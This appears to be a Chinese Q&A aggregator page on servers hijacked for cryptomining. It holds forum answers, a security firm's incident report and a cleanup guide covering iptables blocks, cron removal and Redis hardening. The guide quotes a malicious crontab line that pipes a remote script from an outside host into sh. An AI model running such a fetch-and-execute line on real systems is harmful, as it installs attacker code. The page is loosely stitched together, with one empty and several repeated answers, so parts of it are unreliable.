当前位置:首页 » 挖矿知识 » 别人用服务器挖矿

别人用服务器挖矿

发布时间: 2022-04-06 06:30:28

1. 服务器 被人安装上挖矿

比特币 是吧

2. 服务器被下挖矿了怎么办

哥们被下了啥挖矿?去举报啊。之前流量矿石非常火的时候,我的服务器也被无良黑了,成了肉鸡,然后我去找到他的信息,截图跟流量矿石举报,就帮我处理了。你看你的被下了啥,就去找他们处理。

3. 为什么黑客们要广设服务器,用别人的手机设备去挖矿

因为用别人的手机会更加安全一点,这样公安局或者安全局就不容易找到黑客的地址了。

“偷矿”是指未经你同意的情况下,黑客利用你的系统资源挖掘虚拟货币。这主要借助于网站的 JavaScript 代码,黑客在代码中注入“偷矿”程序,当你访问这些代码时,“偷矿”程序便会偷偷自动运行。

虽然 Chrome 是最常用的浏览器,但是 Opera 浏览器提供了一些 Chrome 没有的有趣功能。最新版本的 Opera 浏览器能够自动拦截广告,此外,它还内置了阻止挖矿的防护功能。这一功能可以阻止网站擅自运行非法挖矿的脚本,这与网页上的广告拦截技术并没有太大区别。

2.使用清理程序

如果采用了上面的措施之后你仍然放心不下,那么可以在电脑和智能手机上安装 Malwarebytes 清理程序,它的电脑版是完全免费的,但是针对手机的高级版是收费的。随着现在越来越多的区块链项目开始采用手机挖矿,如果你不想让自己的手机有被当作肉鸡的风险,适当花点小钱也是值得的。

你仍然可以继续使用像卡巴斯基这样的防病毒软件来保护自己的智能手机。




4. 新人想用服务器挖矿,是否可行

完全可以。

5. 求助服务器被挖矿程序入侵,如何排查

新客户于最近向我们SINE安全公司咨询,说他的服务器经常卡的网站无法打开,远程连接

服务器的慢的要命,有时候PING值都达到300-500之间,还经常掉包,听客户这么一说,一般

会判断为受到了CC+DDOS混合流量攻击,再具体一问,说是机房那面没有受到流量攻击,这

就有点奇怪了,不是流量攻击,还导致服务器卡,网站无法打开,这是什么攻击?为了解决客

户服务器卡的问题,我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。

挖矿木马还设计了挖矿进程如果被客户强制停止后,会自动启动继续挖矿,达到不间断的挖矿,

仔细检查发现是通过设置了每个小时执行任务计划,远程下载shell挖矿木马,然后执行,检查

当前进程是否存在,不存在就启动挖矿木马,进行挖矿。

对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据,以及感染蠕虫的病

毒,如果数据被加密那损失大了,客户是做平台的,里面的客户数据很重要,找出挖矿木马后,

客户需要知道服务器到底是如何被攻击的? 被上传挖矿木马的? 防止后期再出现这样的攻击

状况。

通过我们安全工程师的安全检测与分析,发现该服务器使用的是apache tomcat环境,平台的开

发架构是JSP+oracle数据库,apache tomcat使用的是2016年的版本,导致该apache存在严重

的远程执行命令漏洞,入侵者可以通过该漏洞直接入侵服务器,拿到服务器的管理员权限,

SINE安全工程师立即对apache 漏洞进行修复,并清除木马,至此问题得以解决,客户服务器

一切稳定运行,网站打开正常。

6. 服务器好像被挖矿了,wnTKYg,怎么弄

之前流量矿石非常火的时候,我的服务器也被无良黑了,成了肉鸡,然后我去找到他的信息,截图跟流量矿石举报,就帮我处理了。

7. 新人想用服务器挖矿可以吗

完全可以。

8. 朋友拉我租服务器挖矿换取暗黑币赚钱能做吗

现在不好赚钱了,如果有经验,防止封号,还有暗黑币的渠道,是可以的。挖矿这个行情不好说,说不准涨或者跌,谨慎挖矿,理性赚钱。

9. 有人在联通网络机房放服务器挖矿要找什么部门投诉

10. 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top,查看了一会,没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:

View Code

解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.

热点内容
usdt比例 发布:2025-07-25 22:07:34 浏览:179
人脸识别需要多少T算力 发布:2025-07-25 21:59:53 浏览:834
乐天钱包数字货币下载 发布:2025-07-25 21:55:53 浏览:139
新型基础设施与区块链介绍 发布:2025-07-25 21:41:00 浏览:548
如何获得以太坊测试币 发布:2025-07-25 21:19:15 浏览:761
区块链数字货币搬砖套利软件 发布:2025-07-25 21:10:28 浏览:240
币圈0基础教学 发布:2025-07-25 20:57:29 浏览:782
比特币为什么盗电 发布:2025-07-25 20:52:56 浏览:583
btc吸引客户的广告语 发布:2025-07-25 20:49:32 浏览:826
一文看透币圈合约的大坑 发布:2025-07-25 20:23:32 浏览:244